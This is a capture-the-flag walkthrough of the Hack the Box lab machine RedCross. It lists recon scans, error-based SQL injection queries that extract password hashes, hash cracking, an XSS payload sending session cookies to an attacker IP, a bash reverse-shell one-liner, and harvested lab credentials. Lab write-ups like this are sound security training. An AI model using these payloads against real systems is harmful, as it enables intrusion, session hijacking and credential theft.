redcross.md

Hack the Box - RedCross

Machine IP: 10.10.10.113 - Debian

Reconnaisance

Disover all open TCP ports

▶ nmap -Pn -sS -p- 10.10.10.113 -T4 --min-rate 1000 -oN nmap.surface

Identify and scan running services on open ports

▶ sudo nmap -sV -sC -p 22,80,443 10.10.10.113 -oN nmap.deep 

---

Application Mapping

---

Directory Brute-Force

▶ gobuster dir --url https://intra.redcross.htb --wordlist /usr/share/wordlists/directories.txt --no-tls-validation --threads 25 --output intra-dir.out

Recursive Directory Brute-Force

▶ gobuster dir --url https://intra.redcross.htb/pages --wordlist Common-PHP-Filenames.txt --no-tls-validation --threads 25 --output intra-dir-pages.out 

Recursive Directory Brute-Force

▶ gobuster dir --url https://intra.redcross.htb/documentation --wordlist directory-list-2.3-small.txt --no-tls-validation  --threads 25 --output intra-dir-pages.out --extensions pdf,txt 

---

Virtual Host Brute-Force

▶ wfuzz -H 'Host: FUZZ.redcross.htb' -u 'https://10.10.10.113' -w subdomains-top1million-5000.txt --hw 28

---

Testing for SQL Injection

• URL: https://intra.redcross.htb/?page=login
• Capture the request in BurpSuite and copy it to a text file using Copy to file.
• Run sqlmap with the captured request.

SQLMap

▶ sqlmap -r login-request.txt --force-ssl --dbms mysql --batch

Nothing Found

---

Testing for Default Credentials on Login Page

• Logged in as Guest.
• Working credentials: guest:guest.

---

Testing for SQL Injection

• URL: https://intra.redcross.htb/?page=app
• Capture the request in BurpSuite and copy it to a text file using Copy to file.
• Run sqlmap with the captured request.

SQLMap

▶ sqlmap -r userid-filter-request.txt -p o --force-ssl --dbms mysql --batch

Manual Testing

• Inject a ' after the o parameter in the query.
• Extract: Version information.
• Query: ') and extractvalue(0x0a,concat(0x0a,version()))-- -

Database Name

• Extract: Database name.
• Query: ') and extractvalue(0x0a,concat(0x0a,(select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1)))-- -

Tables

• Extract: Table names in the database redcross.
• Query (Table 1): ') and extractvalue(0x0a,concat(0x0a,(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA like "redcross" LIMIT 0,1)))-- -
• Query (Table 2): ') and extractvalue(0x0a,concat(0x0a,(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA like "redcross" LIMIT 1,1)))-- -
• Query (Table 3): ') and extractvalue(0x0a,concat(0x0a,(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA like "redcross" LIMIT 2,1)))-- -
• Tables Found: messages, requests and users.

Columns

• Extract: Column names in the table users.
• Query (Column 1): ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME like "users" LIMIT 0,1)))-- -.
• Query (Column 2): ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME like "users" LIMIT 1,1)))-- -.
• Query (Column 3): ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME like "users" LIMIT 2,1)))-- -.
• Query (Column 4): ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME like "users" LIMIT 3,1)))-- -.
• Query (Column 5): ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME like "users" LIMIT 5,1)))-- -.
• Columns Found: id, username, password, mail and role.

Usernames and Passwords

• Extract: Usernames.
• Query (User 1): ') and extractvalue(0x0a,concat(0x0a,(select username from redcross.users LIMIT 0,1)))-- -.
• Query (User 2): ') and extractvalue(0x0a,concat(0x0a,(select username from redcross.users LIMIT 1,1)))-- -.
• Query (User 3): ') and extractvalue(0x0a,concat(0x0a,(select username from redcross.users LIMIT 1,1)))-- -.
• Query (User 4): ') and extractvalue(0x0a,concat(0x0a,(select username from redcross.users LIMIT 1,1)))-- -.
• Users Found:

  • Extract: Passwords.

  • Query: ') and extractvalue(0x0a,concat(0x0a,(select password from redcross.users LIMIT 0,1)))-- -.

  • The above query returned the password for user admin however the passqord is not complete. The SQL query needs to be modified and then the password will be returned in two parts using two different queries.

  • Query1 : (User:admin - Password) - ') and extractvalue(0x0a,concat(0x0a,(select password from redcross.users LIMIT 0,1)))-- -

  • Query2 : (User:admin - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 0,1) FROM 30)))-- -

  • Combining Both: $2y$10$z/d5GiwZuFqjY1jRiKIPzuPX + Kt0SthLOyU438ajqRBtrb7ZADpwq. = $2y$10$z/d5GiwZuFqjY1jRiKIPzuKt0SthLOyU438ajqRBtrb7ZADpwq.

  • Creds: $2y$10$z/d5GiwZuFqjY1jRiKIPzuKt0SthLOyU438ajqRBtrb7ZADpwq.

  • Query3 : (User:penelope - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 1,1) FROM 1)))-- -

  • Query4 : (User:penelope - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 1,1) FROM 32)))-- -

  • Combining Both: $2y$10$tY9Y955kyFB37GnW4xrC0.J. + FzmkrQhxD..vKCQICvwOEgwfxqgAS = $2y$10$tY9Y955kyFB37GnW4xrC0.J.FzmkrQhxD..vKCQICvwOEgwfxqgAS

  • Creds: $2y$10$tY9Y955kyFB37GnW4xrC0.J.FzmkrQhxD..vKCQICvwOEgwfxqgAS

  • Query5 : (User:charles - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 2,1) FROM 1)))-- -

  • Query6 : (User:charles - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 2,1) FROM 32)))-- -

  • Creds: $2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i

  • Query5 : (User:tricia - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 3,1) FROM 1)))-- -

  • Query5 : (User:tricia - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 3,1) FROM 32)))-- -

  • Creds: $2y$10$Dnv/b2ZBca2O4cp0fsBbjeQ/0HnhvJ7WrC/ZN3K7QKqTa9SSKP6r.

  • Query5 : (User:guest - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 4,1) FROM 1)))-- -

  • Query5 : (User:guest - Password) - ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 4,1) FROM 32)))-- -

  • Creds: $2y$10$U16O2Ylt/uFtzlVbDIzJ8us9ts8f9ITWoPAWcUfK585sZue03YBAi

Crack Hashes

▶ hashcat -m 3200 --username hashes.txt /usr/share/wordlists/rockyou.txt

• hashes.txt

• cracked password: cookiemonster for user charles.

---

Application Testing

• Directory brute-force revealed that this file is accessible: https://intra.redcross.htb/documentation/account-signup.pdf
• Found link: https://intra.redcross.htb/?page=contact
• Fill (added another parameter password)and Submit the form.
• Adding the parameter password returned the credentials guest:guest.

---

Testing for XSS

• Tring to fetch a session-cookie.
• Testing all fields in the form.
• Payload - <script>document.write('<img src="http://10.10.14.34/nothing.gif?cookie' + document.cookie + '"/>)</script>"'.
• Session-Cookie: 9cvn6v8fh74bv8h6bql20dlt27 and Domain is admin.

---

Vhost Application

• Replace the session-cookie.
• Access to Admin Panel.
• Add User
• Creds: random:UxNCeFVf
• SSH: Login allowed using the credentials. However, no information of interest was found.
• Network Firewall: Whitelisted attacker IP.

---

NMAP (After Whitelisting IP)

▶ nmap -sC -sV 10.10.10.113 -oN nmap.whitelist

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-03 01:54 IST                                        [0/1]
Nmap scan report for redcross.htb (10.10.10.113)
Host is up (0.089s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.0.8 or later
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey: 
|   2048 67d385f8eeb8062359d7758ea237d0a6 (RSA)
|   256 89b465271f93721abce3227090db3596 (ECDSA)
|_  256 66bda11c327432e2e664e8a5251b4d67 (ED25519)
80/tcp   open  http        Apache httpd 2.4.25
|_http-title: Did not follow redirect to https://intra.redcross.htb/
|_http-server-header: Apache/2.4.25 (Debian)
443/tcp  open  ssl/http    Apache httpd 2.4.25
|_http-title: Did not follow redirect to https://intra.redcross.htb/
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=intra.redcross.htb/organizationName=Red Cross International/stateOrProvinceName=NY/countryName=US
| Not valid before: 2018-06-03T19:46:58
|_Not valid after:  2021-02-27T19:46:58
|_http-server-header: Apache/2.4.25 (Debian)
1025/tcp open  NFS-or-IIS?
5432/tcp open  postgresql  PostgreSQL DB 9.6.7 - 9.6.12
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=redcross.redcross.htb
| Subject Alternative Name: DNS:redcross.redcross.htb
| Not valid before: 2018-06-03T19:13:20
|_Not valid after:  2028-05-31T19:13:20
Service Info: Host: RedCross; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 182.51 seconds

---

Command Injection

Injection

• Start tcpdump.

▶ tcpdump -i tun0 icmp

• ICMP echo request received from target machine.

Reverse Shell

Reverse Shell Payload: bash -c 'bash -i >& /dev/tcp/10.10.14.34/9001 0>&1'

---

Information Gathering

• DB User: unixusrmgr:dheu%7wjx8B&

• DB User: dbcross:LOSPxnme4f5pH5wp

---